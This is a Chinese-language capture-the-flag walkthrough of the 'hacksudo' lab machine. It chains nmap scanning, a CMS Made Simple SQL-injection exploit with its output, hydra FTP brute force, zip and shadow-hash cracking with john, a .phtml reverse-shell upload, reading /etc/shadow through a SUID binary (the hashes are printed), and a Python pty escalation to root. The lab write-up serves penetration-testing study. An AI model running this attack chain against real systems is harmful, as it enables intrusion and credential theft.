目录
一、主机发现
nmap 192.168.216.0/24
常规的端口扫描
nmap -A -T4 -p- 192.168.216.153
二、漏洞发现
访问80端口,在源代码处有一段提示:凯撒密码+github网站
由于我的github打不开,在搜查wp后发现是一个wav文件提取脚本
dirsearch对该网站进行目录扫描
访问80端口cms目录下的文件,发现是一个cms。
对cms目录下的文件进行扫描,查看了之后没有特别的文件
这里有爆出一个用户名:hacksudo
由于是cms,果断上kali查找该cms的cve,真的有一个sql注入漏洞,该cms的版本为2.2.5 < 2.2.10,可以进行利用。
searchsploit CMS Mode Simple 2.2.5
脚本的利用方式
注意:该脚本需要修改print,不然执行会失败
python3 46635.py -u http://192.168.216.153/cms/
[+] Salt for password found: 21ca796356464b52
[+] Username found: hacksudo
[+] Email found: info@hacksudo.com
[+] Password found: cd658361db0ee541e7fc728aba5570d3
爆出了用户名邮箱和密码,果断上cms登录,但是失败了,接着上ssh进行连接,也失败了,怀疑密码是进行了加密,但是不知道是哪一种加密方式。到这里思路就没了
在网上找wp后发现还有文件没有被发现dict.txt文件,这是一个字典文件。
gobuster dir -e -u http://10.36.101.169 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.html;
将字典文件保存下来作为我们的字典,想到21端口也开放了,结合上面的用户名hacksudo,因此对21端口使用此字典进行爆破
hydra -l hacksudo -P dict.txt ftp://192.168.216.153
成功爆破出密码:hackme
登录到服务器的ftp
第一个flag也在这,将所有文件保存到本机
在解压文件时发现需要密码
对该文件进行爆破,得到密码:fooled
zip2john secr3tSteg.zip > hash #转换为可识别的hash
john hash dict.txt #爆破密码得到fooled
unzip secr3tSteg.zip #解压
之前提示的脚本在这里就有用处了,对wav文件进行提取得到:zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR ;凯撒密码解密得到:wwww.localhost/fog Username=fog:password=hacksudoISRO
有用户名和密码,登录上cms
三、漏洞利用
在该系统出找到了一个文件上传点
经过测试之后,可以上传.asp.aspx.jsp.phtml等后缀的文件
在这里我选择了kali自带的webshell--php-reverse-shell.php,将后缀改为.phtml上传到服务器,kali监听8888端口反弹shell。
反弹shell成功,获得第二个flag。
四、信息收集
有3个用户。
查看SUID文件,发现了一个二进制文件look。可以使用look查看/etc/shadow
/etc/shadow文件下有root和isro用户的hash值
root:$6$zHA6yDSHPcoPX7dX$2oZJxM7gBzhQIT049d4MuR7jAypyZpDPoo6aKQfkJAfJNKF/CgY1GYFCu.Wb5cB6713Zjtzgk.ls0evZ6YToD/
isro:$6$DMdxcRB0fQbGflz2$39vmRyBB0JubEZpJJN13rSzssMQ6t1R6KXLSPjOmpImsyuWqyXHneT8CH0nKr.XDEzKIjt1H3ndbNzirCjOAa/
将这两个用户的hash值保存下来,使用上面得到的字典进行解密。
最终只得到了isro用户的密码:qwerty ;但是已经足够了
登录到isro用户
五、权限提升
查看当前用户可用于提权的命令
查询后发现ls命令并不能用来提权,查看fog下的文件
发现了有root权限的可执行文件fog
查看该文件执行的命令后,有几个命令需要注意。
执行了fog文件后发现是一个python,直接上提权
import pty;pty.spawn("/bin/bash")
成功提权到root,得到最后一个flag!完结!!!
总结
目录遍历:gobuster工具;字典的选择
暴力破解密码
cms漏洞查找
文件上传漏洞的后缀名
/etc/shadow记录用户的密码hash值
使用john对hash加解密
suid提权,有root权限的二进制文件